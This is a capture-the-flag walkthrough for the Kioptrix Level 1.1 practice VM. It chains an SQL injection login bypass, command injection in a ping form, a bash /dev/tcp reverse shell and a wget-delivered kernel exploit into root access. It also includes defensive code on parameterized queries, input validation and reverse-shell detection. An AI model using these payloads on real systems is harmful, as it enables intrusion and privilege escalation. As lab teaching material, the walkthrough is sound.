Let's continue the Kioptrix series with Kioptrix Level 1.1 (#2)
The Kioptrix series is aimed at beginners and so the challenges are pretty easy. The objective is to get root access to the VM by any means possible, except by attacking the actual VM client. The purpose of these vulnerable VMs is to teach the basic techniques and tools used in penetration tests. There is more than one way to achieve the objective in this challenge.
The Kioptrix Level 1.1 VM can be downloaded from here. Note that it is a VMware image and can be used in VMware Workstation or Player. You can convert the image to be compatible with VirtualBox.
## The Hack
The first step in every penetration test is intelligence gathering. This consists of passive and active reconnaissance and enumeration: find out which services on the target server are open to the world and which versions they run, so that you can search for known vulnerabilities.
To achieve this we will use a tool that will become the foundation of your pentesting toolkit: Nmap. The nmap man page can be found here; it explains all the options, flags and arguments usable with nmap.

```
apb@stratios:~$ nmap -sV -A -p- 192.168.163.132
Nmap scan report for 192.168.163.132
Host is up (0.00024s latency).
Not shown: 65528 closed ports
PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 3.9p1 (protocol 1.99)
| ssh-hostkey:
|   1024 8f:3e:8b:1e:58:63:fe:cf:27:a3:18:09:3b:52:cf:72 (RSA1)
|   1024 34:6b:45:3d:ba:ce:ca:b2:53:55:ef:1e:43:70:38:36 (DSA)
|_  1024 68:4d:8c:bb:b6:5a:bd:79:71:b8:71:47:ea:00:42:61 (RSA)
|_sshv1: Server supports SSHv1
80/tcp   open  http     Apache httpd 2.0.52 ((CentOS))
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
111/tcp  open  rpcbind  2 (RPC #100000)
| rpcinfo:
|   program version   port/proto  service
|   100000  2            111/tcp  rpcbind
|   100000  2            111/udp  rpcbind
|   100024  1            617/udp  status
|_  100024  1            620/tcp  status
443/tcp  open  ssl/http Apache httpd 2.0.52 ((CentOS))
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2009-10-08T00:10:47
|_Not valid after:  2010-10-08T00:10:47
|_ssl-date: 2018-01-19T12:08:32+00:00; -2h09m41s from scanner time.
| sslv2:
|   SSLv2 supported
|   ciphers:
|     SSL2_RC2_128_CBC_WITH_MD5
|     SSL2_RC4_128_WITH_MD5
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|     SSL2_RC4_64_WITH_MD5
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|_    SSL2_DES_64_CBC_WITH_MD5
620/tcp  open  status   1 (RPC #100024)
631/tcp  open  ipp      CUPS 1.1
| http-methods:
|_  Potentially risky methods: PUT
|_http-server-header: CUPS/1.1
|_http-title: 403 Forbidden
3306/tcp open  mysql    MySQL (unauthorized)

Host script results:
|_clock-skew: mean: -2h09m41s, deviation: 0s, median: -2h09m41s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.50 seconds
```
The output above shows us which ports are open on the target server, what services are running on those ports and their versions.
The ones which might be of use to us are port 22 (ssh), port 80 (http), port 443 (https) and port 3306 (mysql).
Because http and mysql are running, we can safely assume there might be a website running on this host, possibly a php website which would be connected to the MySQL service and could be vulnerable to sqli (sql injection).
Let's start there and see what comes up.
Browse to http://192.168.163.132 and you should see the following.
…And it's a login page. Let's attempt some sqli.
Now I am assuming the original SQL query in the app looks something like this:

```sql
-- Template query with the user-supplied values concatenated into the string
SELECT * FROM users WHERE username='$username' AND password='$password'

-- A normal login attempt
SELECT * FROM users WHERE username='admin' AND password='somepassword'

-- The same query after entering 1' or 1=1 -- - as the username
SELECT * FROM users WHERE username='1' or 1=1 -- -' AND password=''
```

This works because the single quote in the payload closes the username string, `or 1=1` adds a condition that is always true, and `-- -` turns the rest of the line, including the password check, into a comment. Since 1 will ALWAYS equal 1, the WHERE clause matches every row, the query returns a result and the application lets us log in.
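To see exactly why the payload works and what stops it, here is an added example (not code from the original post or the VM) that runs the assumed login query two ways against a constructed in-memory SQLite table standing in for the VM's MySQL backend: once with string concatenation as assumed above, once with bound parameters. The table contents and function names are my own; the payload is the one used on this page.

```python
import sqlite3


def make_db():
    """Constructed stand-in for the application's user table (assumption, not the VM's schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'somepassword')")
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """Builds the query by string concatenation, like the query assumed above.

    The attacker's quote terminates the username literal, so the rest of the
    payload becomes SQL rather than data.
    """
    query = ("SELECT * FROM users WHERE username='" + username
             + "' AND password='" + password + "'")
    return conn.execute(query).fetchone() is not None


def login_parameterized(conn, username, password):
    """Hardened form: placeholders keep the whole payload inside the string value.

    The database receives the SQL text and the values separately, so no quote
    in the input can change the structure of the statement.
    """
    query = "SELECT * FROM users WHERE username=? AND password=?"
    return conn.execute(query, (username, password)).fetchone() is not None


def demo():
    """Runs the page's payload and a valid login through both variants."""
    conn = make_db()
    payload = "1' or 1=1 -- -"          # the username entered on the login page
    return {
        "valid_creds_vulnerable": login_vulnerable(conn, "admin", "somepassword"),
        "payload_vulnerable": login_vulnerable(conn, payload, ""),
        "valid_creds_parameterized": login_parameterized(conn, "admin", "somepassword"),
        "payload_parameterized": login_parameterized(conn, payload, ""),
    }


if __name__ == "__main__":
    for name, logged_in in demo().items():
        print(f"{name}: {logged_in}")
```

The vulnerable variant accepts the payload with an empty password; the parameterized variant treats the whole string as a username that does not exist and rejects it, while still accepting the real credentials.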
Now we are given an application which can be used to ping network machines. Let’s test and ping the localhost.
So the ping actually works. Now I wonder if we can run other commands besides ping from this interface. Let's test: enter `localhost; ls; id` and submit.
This application / script is vulnerable to command injection. We are able to ping the machine, do a long listing of the directory the script resides in and see we are running as user apache.
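The page does not show the ping script's source, so as an added example (not from the original post or the VM) here is a hypothetical Python reconstruction of the vulnerable pattern next to a hardened handler: the unsafe version pastes the input into a shell command line, the safe version validates the target as an IP literal or a plain hostname and passes it as a separate argv element with no shell involved. The `shell_commands` helper only illustrates how a shell would split the injected line; nothing is executed. All names here are my own.

```python
import ipaddress
import re
import shlex

# RFC 1123-style hostname: labels of letters, digits and hyphens joined by dots.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(\.[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$"
)


def ping_command_unsafe(target):
    """Vulnerable pattern (hypothetical reconstruction): user input is glued onto a
    command line that would then be handed to a shell, e.g. via os.system()."""
    return "ping -c 3 " + target


def shell_commands(cmdline):
    """Split a command line the way a POSIX shell would, returning one argv per ';'-separated command.
    Used only to show what the unsafe line turns into; it does not run anything."""
    lexer = shlex.shlex(cmdline, posix=True, punctuation_chars=True)
    commands, current = [], []
    for token in lexer:
        if token == ";":
            commands.append(current)
            current = []
        else:
            current.append(token)
    if current:
        commands.append(current)
    return commands


def validate_target(target):
    """Allow-list check: accept an IP literal or a plain hostname, reject anything else."""
    try:
        ipaddress.ip_address(target)
        return target
    except ValueError:
        pass
    if HOSTNAME_RE.match(target):
        return target
    raise ValueError("invalid ping target")


def ping_command_safe(target):
    """Hardened form: validated input becomes one argv element for subprocess.run(argv)
    (no shell=True), so metacharacters can never start a second command."""
    return ["ping", "-c", "3", validate_target(target)]


if __name__ == "__main__":
    payload = "localhost; ls; id"          # the input submitted on the page
    print(shell_commands(ping_command_unsafe(payload)))
    try:
        print(ping_command_safe(payload))
    except ValueError as exc:
        print("rejected:", exc)
```

Validation alone is not the fix; the argv list is. Even with a permissive validator, passing the target as its own argument to `subprocess.run` without a shell means `;`, `|` and `&&` are just characters in a hostname that ping will fail to resolve.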
Let’s take it a little further and see if we can get a remote shell. To do this we will run nc (netcat) on our kali machine to listen on a specific port, then execute bash on the target host to make a tcp connection to our kali machine on the specified port.
First set up nc on your kali machine to listen on port 80.
```
root@stratios:~# nc -nlvp 80
listening on [any] 80 ...
```

Then enter the following in the ping script; it runs a ping and then the reverse shell command.

```
127.0.0.1; bash -i >& /dev/tcp/192.168.163.128/80 0>&1
```

Go back to your Kali shell and you'll see the reverse shell connect:

```
connect to [192.168.163.128] from (UNKNOWN) [192.168.163.132] 32779
bash: no job control in this shell
bash-3.00$ id
uid=48(apache) gid=48(apache) groups=48(apache)
bash-3.00$
```
And we got a shell on the target machine as the apache user. Let's gather some information about this host which we can use to look for a privilege escalation exploit.
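From the defender's side, the connection above is an ESTABLISHED TCP socket owned by the apache user with a high local port, which a web server that only answers requests on 80 and 443 never creates itself. As an added example (not from the original post), this script parses lines in `/proc/net/tcp` format and flags such sockets. The sample lines are constructed to mirror the connection shown above, using the little-endian hex address encoding of an x86 host; the uid 48 comes from the `id` output on this page.

```python
import socket
import struct

WEB_UID = 48            # uid of the apache user in the shell output above
ESTABLISHED = "01"      # socket state code used by /proc/net/tcp

# Constructed sample in /proc/net/tcp format: the Apache listener on :80, the
# reverse shell's outbound socket (192.168.163.132:32779 -> 192.168.163.128:80),
# and an inbound sshd session owned by root for contrast.
SAMPLE = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 00000000:0050 00000000:0000 0A 00000000:00000000 00:00000000 00000000    48        0 12345 1 00000000 100 0 0 10 0
   1: 84A3A8C0:800B 80A3A8C0:0050 01 00000000:00000000 00:00000000 00000000    48        0 12346 1 00000000 20 4 30 10 -1
   2: 84A3A8C0:0016 0100007F:C350 01 00000000:00000000 00:00000000 00000000     0        0 12347 1 00000000 20 4 30 10 -1
"""


def decode_addr(field):
    """Turn 'HEXIP:HEXPORT' into (dotted IP, port). The kernel prints the IPv4 address
    as a 32-bit host-order integer, so on little-endian x86 the bytes appear reversed."""
    hexip, hexport = field.split(":")
    ip = socket.inet_ntoa(struct.pack("<I", int(hexip, 16)))
    return ip, int(hexport, 16)


def parse_proc_net_tcp(text):
    """Parse /proc/net/tcp text into a list of socket dicts (header line skipped)."""
    conns = []
    for line in text.splitlines()[1:]:
        fields = line.split()
        if len(fields) < 8:
            continue
        conns.append({
            "local": decode_addr(fields[1]),
            "remote": decode_addr(fields[2]),
            "state": fields[3],
            "uid": int(fields[7]),
        })
    return conns


def suspicious_outbound(conns, uid=WEB_UID, service_ports=(80, 443)):
    """Flag ESTABLISHED sockets owned by the web server uid whose local port is not
    one it serves on: those are connections the web server process initiated."""
    return [c for c in conns
            if c["state"] == ESTABLISHED
            and c["uid"] == uid
            and c["local"][1] not in service_ports]


if __name__ == "__main__":
    for c in suspicious_outbound(parse_proc_net_tcp(SAMPLE)):
        print("suspicious: uid %d %s:%d -> %s:%d" % (c["uid"], *c["local"], *c["remote"]))
```

On a live host read the real file (`open("/proc/net/tcp").read()`) and pair a hit with the owning process via `ss -tnp` or `/proc/<pid>/fd`; a bash process owned by apache holding that socket is the reverse shell. The same logic applies to `/proc/net/tcp6` with a 128-bit address field.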
Get the OS and kernel version:

```
bash-3.00$ cat /etc/redhat-release
CentOS release 4.5 (Final)
bash-3.00$ uname -a
Linux kioptrix.level2 2.6.9-55.EL #1 Wed May 2 13:52:16 EDT 2007 i686 i686 i386 GNU/Linux
```
Now that we have version numbers, let's see if anything comes up in exploitdb.

```
apb@stratios:~$ searchsploit centos
Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4/5/6 x86) - 'ip_append_data()' Ring0 Privilege Escalation (1) | exploits/linux_x86/local/9542.c
apb@stratios:~$ searchsploit 2.6.9
Linux Kernel 2.6.9 < 2.6.11 (RHEL 4) - 'SYS_EPoll_Wait' Local Integer Overflow / Local Privilege Escalation | exploits/linux/local/1397.c
```

Two hits to try. Let's start with the first one.
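Matching an advisory's version range by eye is error-prone, so here is an added example (not from the original post) that parses the two searchsploit titles above, extracts their `low < high` kernel ranges and checks whether a `uname -r` string falls inside them. It serves a patch audit as much as triage: run it over an inventory of kernel versions to see which hosts sit inside a published range. The parsing regexes and function names are my own. Caveat: distribution kernels such as the 2.6.9-55.EL build here carry backported fixes, so a match on the upstream version number is a prompt to check the vendor's errata, not proof of exposure.

```python
import re

# Constructed copy of the two result lines shown by searchsploit above.
SEARCHSPLOIT_OUTPUT = """\
Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4/5/6 x86) - 'ip_append_data()' Ring0 Privilege Escalation (1) | exploits/linux_x86/local/9542.c
Linux Kernel 2.6.9 < 2.6.11 (RHEL 4) - 'SYS_EPoll_Wait' Local Integer Overflow / Local Privilege Escalation | exploits/linux/local/1397.c
"""

# "Linux Kernel <low> < <high>" as searchsploit prints version ranges.
RANGE_RE = re.compile(r"Linux Kernel (\d+(?:\.\d+)*) < (\d+(?:\.\d+)*)")


def parse_version(text, width=3):
    """Leading dotted version of a string, padded to `width` components.
    '2.6.9-55.EL' -> (2, 6, 9); '2.6' -> (2, 6, 0)."""
    m = re.match(r"\d+(?:\.\d+)*", text)
    if not m:
        raise ValueError("no version number in %r" % text)
    parts = [int(p) for p in m.group(0).split(".")]
    return tuple((parts + [0] * width)[:width])


def parse_searchsploit(text):
    """Return (path, low, high) for every result line carrying a version range."""
    entries = []
    for line in text.splitlines():
        if "|" not in line:
            continue
        title, path = (part.strip() for part in line.rsplit("|", 1))
        m = RANGE_RE.search(title)
        if m:
            entries.append((path, parse_version(m.group(1)), parse_version(m.group(2))))
    return entries


def affected_entries(uname_release, text=SEARCHSPLOIT_OUTPUT):
    """Paths of the results whose range low <= kernel < high contains the given release."""
    version = parse_version(uname_release)
    return [path for path, low, high in parse_searchsploit(text) if low <= version < high]


if __name__ == "__main__":
    for release in ("2.6.9-55.EL", "2.6.12", "2.6.19"):
        print(release, "->", affected_entries(release))
```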
Copy the exploit to the /tmp directory and compile.
```
apb@stratios:/tmp$ cp /usr/share/exploitdb/exploits/linux_x86/local/9542.c /tmp/
apb@stratios:/tmp$ gcc -o 9542 9542.c
9542.c: Assembler messages:
9542.c:48: Error: operand type mismatch for `push'
9542.c:51: Error: invalid instruction suffix for `push'
9542.c:54: Error: invalid instruction suffix for `pop'
```

We get this error because the exploit was written for 32-bit systems and we are compiling it on a 64-bit host.
Try again with an additional flag telling gcc to build a 32-bit binary.

```
apb@stratios:/tmp$ gcc -m32 9542.c -o 9542
```
Now we need to get this exploit onto the target server.
Copy the exploit into the Apache document root on your Kali machine and start the web server.

```
root@stratios:/tmp# cp 9542 /var/www/html/
root@stratios:/tmp# cd /var/www/html/
root@stratios:/var/www/html# ls -l
total 24
-rwxr-xr-x 1 root root  7924 Feb 23 10:55 9542
-rw-r--r-- 1 root root 10701 Apr 16  2017 index.html
-rw-r--r-- 1 root root   612 Oct 20 16:41 index.nginx-debian.html
root@stratios:/var/www/html# /etc/init.d/apache2 start
[ ok ] Starting apache2 (via systemctl): apache2.service.
```
Download the exploit onto the target machine from the reverse shell, make it executable and run it.
```
bash-3.00$ cd /tmp
bash-3.00$ ls
bash-3.00$ wget http://192.168.163.128/9542
--21:19:55--  http://192.168.163.128/9542
           => `9542'
Connecting to 192.168.163.128:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 7,924 (7.7K)

    0K .......                                               100%  503.79 MB/s

21:19:55 (503.79 MB/s) - `9542' saved [7924/7924]

bash-3.00$ ls -l
total 8
-rw-r--r-- 1 apache apache 7924 Feb 23  2018 9542
bash-3.00$ chmod +x 9542
bash-3.00$ ./9542
bash: [3333: 4] tcsetattr: Invalid argument
bash-3.00$ id
uid=48(apache) gid=48(apache) groups=48(apache)
```
So I'm guessing it might have something to do with compiling the exploit on Kali, so let's copy the exploit onto the target machine, compile it there and execute it.

```
bash-3.00$ wget http://192.168.163.128/9542.c
--21:25:12--  http://192.168.163.128/9542.c
           => `9542.c'
Connecting to 192.168.163.128:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2,643 (2.6K) [text/x-csrc]

    0K ..                                                    100%  252.06 MB/s

21:25:12 (252.06 MB/s) - `9542.c' saved [2643/2643]

bash-3.00$ gcc 9542.c -o priv
9542.c:109:28: warning: no newline at end of file
bash-3.00$ ls
9542  9542.c  priv
bash-3.00$ chmod +x priv
bash-3.00$ ./priv
sh: no job control in this shell
sh-3.00# id
uid=0(root) gid=0(root) groups=48(apache)
```
Success! root shell obtained.
“The udp_sendmsg function in the UDP implementation in (1) net/ipv4/udp.c and (2) net/ipv6/udp.c in the Linux kernel before 2.6.19 allows local users to gain privileges or cause a denial of service (NULL pointer dereference and system crash) via vectors involving the MSG_MORE flag and a UDP socket.”
Thanks for reading!